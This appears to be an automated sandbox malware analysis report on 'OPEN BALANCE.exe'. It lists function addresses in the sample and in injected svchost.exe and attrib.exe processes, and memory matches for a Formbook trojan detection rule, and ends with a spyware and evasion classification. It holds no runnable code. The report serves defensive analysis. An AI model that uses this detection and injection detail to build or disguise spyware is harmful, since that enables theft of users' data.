Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008619B0	0_2_008619B0
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_00847920	0_2_00847920
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_0085997D	0_2_0085997D
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_00867A4A	0_2_00867A4A
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_00867CA7	0_2_00867CA7
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_00861C77	0_2_00861C77
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_00879EEE	0_2_00879EEE
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008CBE44	0_2_008CBE44
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_00861F32	0_2_00861F32
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_014E3620	0_2_014E3620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401080	2_2_00401080
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042E113	2_2_0042E113
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040F9C3	2_2_0040F9C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040F9BC	2_2_0040F9BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403290	2_2_00403290
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402340	2_2_00402340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FBE3	2_2_0040FBE3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040DC63	2_2_0040DC63
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402504	2_2_00402504
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402510	2_2_00402510
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004026EE	2_2_004026EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004026F0	2_2_004026F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416693	2_2_00416693
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4E3F0	2_2_03A4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B003E6	2_2_03B003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFA352	2_2_03AFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC02C0	2_2_03AC02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B001AA	2_2_03B001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF81CC	2_2_03AF81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A30100	2_2_03A30100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADA118	2_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC8158	2_2_03AC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2000	2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3C7C0	2_2_03A3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A64750	2_2_03A64750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5C6E0	2_2_03A5C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B00591	2_2_03B00591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40535	2_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AEE4F6	2_2_03AEE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF2446	2_2_03AF2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF6BD7	2_2_03AF6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFAB40	2_2_03AFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B0A9A6	2_2_03B0A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A56962	2_2_03A56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A268B8	2_2_03A268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E8F0	2_2_03A6E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4A840	2_2_03A4A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A42840	2_2_03A42840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABEFA0	2_2_03ABEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4CFE0	2_2_03A4CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A32FC8	2_2_03A32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A82F28	2_2_03A82F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A60F30	2_2_03A60F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB4F40	2_2_03AB4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A52E90	2_2_03A52E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFCE93	2_2_03AFCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFEEDB	2_2_03AFEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFEE26	2_2_03AFEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40E59	2_2_03A40E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A58DBF	2_2_03A58DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3ADE0	2_2_03A3ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4AD00	2_2_03A4AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0CB5	2_2_03AE0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A30CF2	2_2_03A30CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40C00	2_2_03A40C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A8739A	2_2_03A8739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF132D	2_2_03AF132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2D34C	2_2_03A2D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A452A0	2_2_03A452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE12ED	2_2_03AE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5B2C0	2_2_03A5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4B1B0	2_2_03A4B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A7516C	2_2_03A7516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2F172	2_2_03A2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B0B16B	2_2_03B0B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF70E9	2_2_03AF70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFF0E0	2_2_03AFF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AEF0CC	2_2_03AEF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A470C0	2_2_03A470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFF7B0	2_2_03AFF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF16CC	2_2_03AF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADD5B0	2_2_03ADD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF7571	2_2_03AF7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFF43F	2_2_03AFF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A31460	2_2_03A31460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5FB80	2_2_03A5FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB5BF0	2_2_03AB5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A7DBF9	2_2_03A7DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFFB76	2_2_03AFFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADDAAC	2_2_03ADDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A85AA0	2_2_03A85AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AEDAC6	2_2_03AEDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB3A6C	2_2_03AB3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFFA49	2_2_03AFFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF7A46	2_2_03AF7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD5910	2_2_03AD5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A49950	2_2_03A49950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5B950	2_2_03A5B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A438E0	2_2_03A438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAD800	2_2_03AAD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFFFB1	2_2_03AFFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A41F92	2_2_03A41F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFFF09	2_2_03AFFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A49EB0	2_2_03A49EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5FDC0	2_2_03A5FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF7D73	2_2_03AF7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A43D40	2_2_03A43D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF1D5A	2_2_03AF1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFFCF2	2_2_03AFFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB9C32	2_2_03AB9C32
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FC02C0	5_2_02FC02C0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FE0274	5_2_02FE0274
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_030003E6	5_2_030003E6
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F4E3F0	5_2_02F4E3F0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FFA352	5_2_02FFA352
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_030001AA	5_2_030001AA
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FD2000	5_2_02FD2000
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FF81CC	5_2_02FF81CC
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FC8158	5_2_02FC8158
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FDA118	5_2_02FDA118
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F30100	5_2_02F30100
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F5C6E0	5_2_02F5C6E0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F3C7C0	5_2_02F3C7C0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F40770	5_2_02F40770
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F64750	5_2_02F64750
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FEE4F6	5_2_02FEE4F6
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_03000591	5_2_03000591
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FF2446	5_2_02FF2446
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FE4420	5_2_02FE4420
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F40535	5_2_02F40535
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F3EA80	5_2_02F3EA80
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FF6BD7	5_2_02FF6BD7
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FFAB40	5_2_02FFAB40
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F6E8F0	5_2_02F6E8F0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F268B8	5_2_02F268B8
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_0300A9A6	5_2_0300A9A6
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F4A840	5_2_02F4A840
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F42840	5_2_02F42840
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F429A0	5_2_02F429A0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F56962	5_2_02F56962
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FFEEDB	5_2_02FFEEDB
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F52E90	5_2_02F52E90
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FFCE93	5_2_02FFCE93
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F40E59	5_2_02F40E59
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FFEE26	5_2_02FFEE26
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F4CFE0	5_2_02F4CFE0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F32FC8	5_2_02F32FC8
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FBEFA0	5_2_02FBEFA0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FB4F40	5_2_02FB4F40
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F60F30	5_2_02F60F30
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FE2F30	5_2_02FE2F30
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F82F28	5_2_02F82F28
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F30CF2	5_2_02F30CF2
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FE0CB5	5_2_02FE0CB5
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F40C00	5_2_02F40C00
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F3ADE0	5_2_02F3ADE0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F58DBF	5_2_02F58DBF
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FDCD1F	5_2_02FDCD1F
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F4AD00	5_2_02F4AD00
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FE12ED	5_2_02FE12ED
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F5B2C0	5_2_02F5B2C0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F452A0	5_2_02F452A0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F8739A	5_2_02F8739A
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F2D34C	5_2_02F2D34C
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FF132D	5_2_02FF132D
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FF70E9	5_2_02FF70E9
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FFF0E0	5_2_02FFF0E0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FEF0CC	5_2_02FEF0CC
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F470C0	5_2_02F470C0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_0300B16B	5_2_0300B16B
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F4B1B0	5_2_02F4B1B0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F2F172	5_2_02F2F172
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F7516C	5_2_02F7516C
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FF16CC	5_2_02FF16CC
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FFF7B0	5_2_02FFF7B0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F31460	5_2_02F31460
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FFF43F	5_2_02FFF43F
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FDD5B0	5_2_02FDD5B0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FF7571	5_2_02FF7571
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FEDAC6	5_2_02FEDAC6
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FDDAAC	5_2_02FDDAAC
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F85AA0	5_2_02F85AA0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FE1AA3	5_2_02FE1AA3
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FB3A6C	5_2_02FB3A6C
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FFFA49	5_2_02FFFA49
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FF7A46	5_2_02FF7A46
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FB5BF0	5_2_02FB5BF0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F7DBF9	5_2_02F7DBF9
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F5FB80	5_2_02F5FB80
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FFFB76	5_2_02FFFB76
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F438E0	5_2_02F438E0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FAD800	5_2_02FAD800
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F49950	5_2_02F49950
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F5B950	5_2_02F5B950
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FD5910	5_2_02FD5910
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F49EB0	5_2_02F49EB0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F03FD2	5_2_02F03FD2
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F03FD5	5_2_02F03FD5
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FFFFB1	5_2_02FFFFB1
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F41F92	5_2_02F41F92
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FFFF09	5_2_02FFFF09
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FFFCF2	5_2_02FFFCF2
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FB9C32	5_2_02FB9C32
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F5FDC0	5_2_02F5FDC0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FF7D73	5_2_02FF7D73
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02FF1D5A	5_2_02FF1D5A
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02F43D40	5_2_02F43D40
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_025614F0	5_2_025614F0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_0255C6C0	5_2_0255C6C0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_0255A740	5_2_0255A740
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_0255C499	5_2_0255C499
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_0255C4A0	5_2_0255C4A0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_0257ABF0	5_2_0257ABF0
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02563170	5_2_02563170
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02DDE2C8	5_2_02DDE2C8
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02DDE3E3	5_2_02DDE3E3
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02DE534C	5_2_02DE534C
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02DDD7E8	5_2_02DDD7E8
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02DDE77C	5_2_02DDE77C
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_02DDCA93	5_2_02DDCA93

Source: C:\Windows\SysWOW64\attrib.exe	Code function: String function: 02FAEA12 appears 86 times
Source: C:\Windows\SysWOW64\attrib.exe	Code function: String function: 02FBF290 appears 105 times
Source: C:\Windows\SysWOW64\attrib.exe	Code function: String function: 02F75130 appears 58 times
Source: C:\Windows\SysWOW64\attrib.exe	Code function: String function: 02F87E54 appears 102 times
Source: C:\Windows\SysWOW64\attrib.exe	Code function: String function: 02F2B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03AAEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03A2B970 appears 275 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03A87E54 appears 100 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03ABF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03A75130 appears 57 times
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: String function: 00860A30 appears 46 times
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: String function: 00849CB3 appears 31 times
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: String function: 0085F9F2 appears 40 times

Source: OPEN BALANCE.exe, 00000000.00000003.2053856074.0000000003EF3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs OPEN BALANCE.exe
Source: OPEN BALANCE.exe, 00000000.00000003.2053219263.000000000409D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs OPEN BALANCE.exe

Source: OPEN BALANCE.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2470951114.00000000062C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3918981184.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3918918211.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2469686151.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.3918414894.0000000000630000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3917936573.0000000002550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3919198239.0000000002D60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2470241137.0000000003DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/5@8/8

